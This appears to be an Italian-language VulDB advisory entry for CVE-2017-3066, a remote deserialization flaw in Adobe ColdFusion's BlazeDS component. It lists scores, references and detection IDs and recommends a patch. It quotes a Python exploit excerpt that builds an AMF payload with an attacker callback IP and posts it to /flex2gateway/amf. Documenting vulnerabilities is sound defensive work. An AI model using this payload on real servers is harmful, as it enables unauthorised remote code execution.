Adobe ColdFusion 10/11/2016 Apache BlazeDS Library escalazione di privilegi
CVSS Punteggio Meta Temp | Exploit Prezzo Attuale (≈) | Punteggio di interesse CTI |
---|---|---|
7.7 | $0-$5k | 0.00 |
È stata rilevata una vulnerabilità di livello critico in Adobe ColdFusion 10/11/2016 (Programming Language Software). Interessato da questa vulnerabilità è una funzione sconosciuta del componente Apache BlazeDS Library. Attraverso la manipolazione di un input sconosciuto per mezzo di una vulerabilità di classe escalazione di privilegi. Questo ha effetti su riservatezza, integrità e disponibilità.
Data di scoperta del problema 25/04/2017. La vulnerabilità è stata pubblicata in data 25/04/2017 con identificazione APSB17-14 con un security bulletin (Website) (confermato). L'advisory è scaricabile da helpx.adobe.com. Questo punto di criticità è identificato come CVE-2017-3066. L'attacco può avvenire nella rete. Per l'uso non è richiesta un'autentificazione. Non sono conosciuti dettagli tecnici ma un pubblico metodo di utilizzo è disponibile.
Un metodo di utilizzo è stato sviluppato da Faisal Tameesh in Python ed è stata pubblicata 11 mesi dopo il comunicato. L'exploit è scaricabile da exploit-db.com. È stato dichiarato come proof-of-concept. Per lo scanned Nessus, è disponibile un plugin, numero ID 99731 (Adobe ColdFusion BlazeDS Java Object Deserialization RCE), che può aiutare a determinare l'esistenza della criticità nel sistema analizzato. Il codice utilizzato dal exploit è:
amf_payload = '\x00\x03\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\x11\x0a' + \ '\x07\x33' + 'sun.rmi.server.UnicastRef' + struct.pack('>H', len(callback_IP)) + callback_IP + \ struct.pack('>I', int(callback_port)) + \ '\xf9\x6a\x76\x7b\x7c\xde\x68\x4f\x76\xd8\xaa\x3d\x00\x00\x01\x5b\xb0\x4c\x1d\x81\x80\x01\x00'; url = "http://" + target_IP + ":" + target_port + "/flex2gateway/amf" headers = {'Content-Type': 'application/x-amf'} response = requests.post(url, headers=headers, data=amf_payload, verify=False)
Applicando a patch è possibile eliminare il problema. Una possibile soluzione è stata pubblicata immediatamente dopo la pubblicazione della vulnerabilità.
La vulnerabilità è documentata anche nel database Tenable (99731) e Exploit-DB (43993).
Prodotto
Genere
Fornitore
Nome
Versione
Licenza
CPE 2.3
CPE 2.2
CVSSv4
VulDB CVSS-B Score: 🔍VulDB CVSS-BT Score: 🔍
VulDB Vettore: 🔍
VulDB Affidabilità: 🔍
CVSSv3
VulDB Punteggio meta-base: 8.5VulDB Punteggio Meta Temp: 8.2
VulDB Punteggio di base: 7.3
VulDB Punteggio temporaneo: 6.6
VulDB Vettore: 🔍
VulDB Affidabilità: 🔍
NVD Punteggio di base: 9.8
NVD Vettore: 🔍
CVSSv2
AV | AC | Au | C | I | A |
---|---|---|---|---|---|
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
💳 | 💳 | 💳 | 💳 | 💳 | 💳 |
Vettore | Complessità | Autenticazione | Riservatezza | Integrità | Disponibilità |
---|---|---|---|---|---|
sbloccare | sbloccare | sbloccare | sbloccare | sbloccare | sbloccare |
sbloccare | sbloccare | sbloccare | sbloccare | sbloccare | sbloccare |
sbloccare | sbloccare | sbloccare | sbloccare | sbloccare | sbloccare |
VulDB Punteggio di base: 🔍
VulDB Punteggio temporaneo: 🔍
VulDB Affidabilità: 🔍
NVD Punteggio di base: 🔍
Exploiting
Classe: Escalazione di privilegiCWE: CWE-502 / CWE-20
CAPEC: 🔍
ATT&CK: 🔍
Locale: No
Remoto: Si
Disponibilità: 🔍
Accesso: Pubblico
Stato: Proof-of-Concept
Autore: Faisal Tameesh
Linguaggio Di Programmazione: 🔍
Scaricamento: 🔍
EPSS Score: 🔍
EPSS Percentile: 🔍
Previsione dei prezzi: 🔍
Preventivo attuale: 🔍
0-Day | sbloccare | sbloccare | sbloccare | sbloccare |
---|---|---|---|---|
Oggi | sbloccare | sbloccare | sbloccare | sbloccare |
Nessus ID: 99731
Nessus Nome: Adobe ColdFusion BlazeDS Java Object Deserialization RCE
Nessus File: 🔍
Nessus Rischio: 🔍
Nessus Family: 🔍
Nessus Context: 🔍
OpenVAS ID: 801267
OpenVAS Nome: Adobe ColdFusion Remote Code Execution And Cross Site Scripting Vulnerabilities
OpenVAS File: 🔍
OpenVAS Family: 🔍
Qualys ID: 🔍
Qualys Nome: 🔍
Exploit-DB: 🔍
Intelligence Sulle Minacce
Interesse: 🔍Attori Attivi: 🔍
Gruppi APT attivi: 🔍
Contromisure
Raccomandazione: PatchStato: 🔍
Tempo di reazione: 🔍
0 giorni di tempo: 🔍
Tempo di esposizione: 🔍
Sfrutta il tempo di ritardo: 🔍
Suricata ID: 2025836
Suricata Classe: 🔍
Suricata Message: 🔍
Sequenza temporale
02/12/2016 🔍25/04/2017 🔍
25/04/2017 🔍
25/04/2017 🔍
25/04/2017 🔍
26/04/2017 🔍
27/04/2017 🔍
27/04/2017 🔍
28/04/2017 🔍
07/02/2018 🔍
07/02/2018 🔍
21/12/2020 🔍
Fonti
Fornitore: adobe.comAdvisory: APSB17-14
Riceratore: Moritz Bechler
Stato: Confermato
Confermato: 🔍
CVE: CVE-2017-3066 (🔍)
SecurityTracker: 1038364
SecurityFocus: 98003 - Adobe Flex BlazeDS CVE-2017-3066 Remote Code Execution Vulnerability
scip Labs: https://www.scip.ch/en/?labs.20161013
Vedi anche: 🔍
Voce
Data di creazione: 27/04/2017 16:47Aggiornamenti: 21/12/2020 15:32
I cambiamenti: 27/04/2017 16:47 (94), 03/01/2020 11:12 (4), 21/12/2020 15:32 (2)
Completa: 🔍
Ancora nessun commento. Le Lingue: it + en.
Effettua il login per commentare.